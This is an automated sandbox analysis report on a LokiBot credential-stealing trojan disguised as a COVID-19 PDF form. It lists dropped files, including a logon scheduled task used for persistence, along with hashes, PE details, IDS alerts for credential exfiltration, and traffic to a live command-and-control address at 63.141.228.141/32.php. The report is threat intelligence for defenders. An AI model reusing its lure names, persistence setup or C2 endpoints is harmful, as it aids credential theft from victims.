                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@6/6@0/1
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 17.8% (good quality ratio 16.4%)
                                        • Quality average: 73.5%
                                        • Quality standard deviation: 31.5%
                                        HCA Information:
                                        • Successful, ratio: 98%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .exe
                                        • Stop behavior analysis, all processes terminated
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                                        • TCP Packets have been reduced to 100
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        14:36:25API Interceptor3x Sleep call for process: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        63.141.228.141IcTsYNL7h3.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/2fhJw7EqIe0Rj
                                        CMA - customer Advisory - Container Charges.pdf.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/fn1ToJTMzu3Td
                                        cotizaci#U00f3n.pdf.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/ocGTdeFq2SWdX
                                        facturas y datos bancarios.PDF____________________________________.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/a1NQk98eWCWX2
                                        http___103.89.90.94_hthp_wininit.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/S4wFP8QBww9Tp
                                        g0-core-ofr-gogreen-plus-infographic.pdf.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/fn1ToJTMzu3Td
                                        datos bancarios y facturaa.pdf____________________________________________________.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/hGVMLp0uMVSWM
                                        gunzipped.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/BMnWlQ62x3Dhz
                                        SecuriteInfo.com.Trojan.Win32.Save.a.16492.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/auJMYiGBL7JHG
                                        #U00c1raj#U00e1nlat k#U00e9r#U00e9se 29#U00b706#U00b72021#U00b7pdf.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/S7zr5v1fXI3Rb
                                        wininit.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/S4wFP8QBww9Tp
                                        oyVktvL5Es.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/S4wFP8QBww9Tp
                                        Quotation of Medical-105.pdf.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/pydAkox9ETY5Y
                                        gunzipped.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/BMnWlQ62x3Dhz
                                        Proforma Invoice.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/pydAkox9ETY5Y
                                        i0GOFEs5MgSta4n.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/L6J4kh5OOGtJ5
                                        Ij5nHFBTiajpgfL.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/6mr5C1QFWrZ4O
                                        BlNBNJ41KC.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/YjfkU88ZV6lc0
                                        purchase inquiry.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/cLsdqrHIILVB5
                                        0B7mA6tYHm.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/W2gf0zvk0cV5n

                                        Domains

                                        No context

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        NOCIXUSIcTsYNL7h3.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        CMA - customer Advisory - Container Charges.pdf.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        cotizaci#U00f3n.pdf.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        facturas y datos bancarios.PDF____________________________________.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        http___103.89.90.94_hthp_wininit.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        g0-core-ofr-gogreen-plus-infographic.pdf.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        datos bancarios y facturaa.pdf____________________________________________________.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        gunzipped.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        PaymentConfirmation.pdf.exeGet hashmaliciousBrowse
                                        • 192.187.111.220
                                        SecuriteInfo.com.Trojan.Win32.Save.a.16492.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        #U00c1raj#U00e1nlat k#U00e9r#U00e9se 29#U00b706#U00b72021#U00b7pdf.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        wininit.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        oyVktvL5Es.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        Quotation of Medical-105.pdf.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        gunzipped.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        Proforma Invoice.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        i0GOFEs5MgSta4n.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        Ij5nHFBTiajpgfL.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        BlNBNJ41KC.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        purchase inquiry.exeGet hashmaliciousBrowse
                                        • 63.141.228.141

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.log
                                        Process:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                        C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp
                                        Process:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1640
                                        Entropy (8bit):5.190304818792931
                                        Encrypted:false
                                        SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBAtn:cbh47TlNQ//rydbz9I3YODOLNdq3Y
                                        MD5:F73872B63B266AFAFA99963F04D01A52
                                        SHA1:9D63EF99D643DB7666E16C2FB91D6E7867682240
                                        SHA-256:AA84922BAC808392632A0865DFC1897AAC611A5D4E3BF1D8035F1C0495D6158D
                                        SHA-512:70C3BEE130D29B53443F66F503B1976BCF5934A04A3CF21A67457658BBD32527EBD72FC42A226D3B7C1A74FD5095CD705EABDD174B431C4DC64EE7BBA4B8A5ED
                                        Malicious:true
                                        Reputation:low
                                        Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                        C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                                        Process:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview: 1
                                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                        Process:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):782
                                        Entropy (8bit):0.6303266404701133
                                        Encrypted:false
                                        SSDEEP:3:/lbOllbOllbOllbOllbOllbOllbOllbOllbON:u
                                        MD5:FF9627A22D5DADFECE3CEF2DDB25DA77
                                        SHA1:436098FB479AF2C7D4AFFFDD3AB473ABB9C0DACB
                                        SHA-256:EE69C77BF8B4528A01D97975F6120BD1C7043FDBF9464E2B3B1C7E4CAAC2E06F
                                        SHA-512:1CDAFD7571755D0C534E14559B78AEFB5567012BC7C1962B5D41C868168EDE0DC2FD68A651FEFB6C0E3D0C7483CC07A5D374176C2400D78EC4B6C800495389BD
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.
                                        C:\Users\user\AppData\Roaming\qvDFOnW.exe
                                        Process:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1109504
                                        Entropy (8bit):5.548871791041164
                                        Encrypted:false
                                        SSDEEP:12288:LHvr5hzhEZ66mE9GXlGxPvL+LI0Iyi/DnyqTts7RAV8hh:Lv9hzhkME9cEFzUI0Iyi/7vmaWhh
                                        MD5:EA646520496FD4603AAF0F5778231F0D
                                        SHA1:5112F3F6AE6A8A7CFAC8364433128228C450F203
                                        SHA-256:A130CF9DF18F1AE304826C98D4E7CFD2E75043B126A1DF0C0A36F98A64CDE5C2
                                        SHA-512:6F5F8F1312B9E2B98F5A4E415C41BC5CA35FB762D0F328C5056A844AA1FBA2DF7FBEE3550D4870EFA43483AF9131B256435070A6D6C1A7C3B1622A4C8678723C
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: Virustotal, Detection: 35%, Browse
                                        • Antivirus: ReversingLabs, Detection: 20%
                                        Reputation:low
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.`.............................(... ...@....@.. .......................`............@..................................'..K....`.......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.......@......................@....rsrc........`......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Roaming\qvDFOnW.exe:Zone.Identifier
                                        Process:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview: [ZoneTransfer]....ZoneId=0

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):5.548871791041164
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Windows Screen Saver (13104/52) 0.07%
                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                        File name:RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        File size:1109504
                                        MD5:ea646520496fd4603aaf0f5778231f0d
                                        SHA1:5112f3f6ae6a8a7cfac8364433128228c450f203
                                        SHA256:a130cf9df18f1ae304826c98d4e7cfd2e75043b126a1df0c0a36f98a64cde5c2
                                        SHA512:6f5f8f1312b9e2b98f5a4e415c41bc5ca35fb762d0f328c5056a844aa1fba2df7fbee3550d4870efa43483af9131b256435070a6d6c1a7c3b1622a4c8678723c
                                        SSDEEP:12288:LHvr5hzhEZ66mE9GXlGxPvL+LI0Iyi/DnyqTts7RAV8hh:Lv9hzhkME9cEFzUI0Iyi/7vmaWhh
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.`.............................(... ...@....@.. .......................`............@................................

                                        File Icon

                                        Icon Hash:7069696969616971

                                        Static PE Info

                                        General

                                        Entrypoint:0x4e280e
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x60DD43B5 [Thu Jul 1 04:25:25 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:v4.0.30319
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xe27c00x4b.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xe60000x2da98.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1140000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000xe08140xe0a00False0.606676274694SysEx File - Jellinghaus6.10267002947IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .sdata0xe40000x1e80x200False0.861328125data6.62657070624IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .rsrc0xe60000x2da980x2dc00False0.163096610314data2.30003219399IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x1140000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0xe64600x2868dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 0, next used block 0
                                        RT_ICON0xe8cc80x16e8dBase IV DBT of \300.DBF, block length 4608, next free block index 40, next free block 0, next used block 0
                                        RT_ICON0xea3b00x668data
                                        RT_ICON0xeaa180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 13107200, next used block 0
                                        RT_ICON0xead000x1e8data
                                        RT_ICON0xeaee80x128GLS_BINARY_LSB_FIRST
                                        RT_ICON0xeb0100x4c28dBase IV DBT, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                        RT_ICON0xefc380x2ca8dBase IV DBT of \300.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                        RT_ICON0xf28e00xea8data
                                        RT_ICON0xf37880x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
                                        RT_ICON0xf40300x6c8data
                                        RT_ICON0xf46f80x568GLS_BINARY_LSB_FIRST
                                        RT_ICON0xf4c600x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                        RT_ICON0x1054880x94a8data
                                        RT_ICON0x10e9300x25a8data
                                        RT_ICON0x110ed80x10a8data
                                        RT_ICON0x111f800x988data
                                        RT_ICON0x1129080x468GLS_BINARY_LSB_FIRST
                                        RT_GROUP_ICON0x112d700x102data
                                        RT_VERSION0x112e740x380data
                                        RT_MANIFEST0x1131f40x8a3XML 1.0 document, UTF-8 Unicode (with BOM) text

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Version Infos

                                        DescriptionData
                                        Translation0x0000 0x04b0
                                        LegalCopyrightCopyright GabSoftware 2009
                                        Assembly Version1.0.1.0
                                        InternalNameInt16ArrayTypeInfo.exe
                                        FileVersion1.0.1.0
                                        CompanyNameGabSoftware
                                        LegalTrademarks
                                        Comments
                                        ProductNameGabCopyPaste
                                        ProductVersion1.0.1.0
                                        FileDescriptionGabCopyPaste
                                        OriginalFilenameInt16ArrayTypeInfo.exe

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        07/01/21-14:36:31.408982TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14971580192.168.2.363.141.228.141
                                        07/01/21-14:36:31.408982TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971580192.168.2.363.141.228.141
                                        07/01/21-14:36:31.408982TCP2025381ET TROJAN LokiBot Checkin4971580192.168.2.363.141.228.141
                                        07/01/21-14:36:31.408982TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24971580192.168.2.363.141.228.141
                                        07/01/21-14:36:32.663221TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14971780192.168.2.363.141.228.141
                                        07/01/21-14:36:32.663221TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971780192.168.2.363.141.228.141
                                        07/01/21-14:36:32.663221TCP2025381ET TROJAN LokiBot Checkin4971780192.168.2.363.141.228.141
                                        07/01/21-14:36:32.663221TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24971780192.168.2.363.141.228.141
                                        07/01/21-14:36:33.952661TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971980192.168.2.363.141.228.141
                                        07/01/21-14:36:33.952661TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971980192.168.2.363.141.228.141
                                        07/01/21-14:36:33.952661TCP2025381ET TROJAN LokiBot Checkin4971980192.168.2.363.141.228.141
                                        07/01/21-14:36:33.952661TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971980192.168.2.363.141.228.141
                                        07/01/21-14:36:35.267014TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972080192.168.2.363.141.228.141
                                        07/01/21-14:36:35.267014TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972080192.168.2.363.141.228.141
                                        07/01/21-14:36:35.267014TCP2025381ET TROJAN LokiBot Checkin4972080192.168.2.363.141.228.141
                                        07/01/21-14:36:35.267014TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972080192.168.2.363.141.228.141
                                        07/01/21-14:36:36.486136TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972180192.168.2.363.141.228.141
                                        07/01/21-14:36:36.486136TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972180192.168.2.363.141.228.141
                                        07/01/21-14:36:36.486136TCP2025381ET TROJAN LokiBot Checkin4972180192.168.2.363.141.228.141
                                        07/01/21-14:36:36.486136TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972180192.168.2.363.141.228.141

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jul 1, 2021 14:36:31.244998932 CEST4971580192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:31.401983976 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:31.405318975 CEST4971580192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:31.408982038 CEST4971580192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:31.564255953 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:31.564367056 CEST4971580192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:31.721736908 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.256418943 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.256474972 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.256511927 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.256548882 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.256587029 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.256623030 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.256623030 CEST4971580192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:32.256659985 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.256659985 CEST4971580192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:32.256689072 CEST4971580192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:32.256696939 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.256768942 CEST4971580192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:32.256881952 CEST4971580192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:32.265707016 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.266645908 CEST4971580192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:32.501713037 CEST4971780192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:32.657932043 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.658143997 CEST4971780192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:32.663220882 CEST4971780192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:32.819720030 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.819875956 CEST4971780192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:32.978811979 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:33.568382978 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:33.568468094 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:33.568520069 CEST804971763.141.228.141192.168.2.3
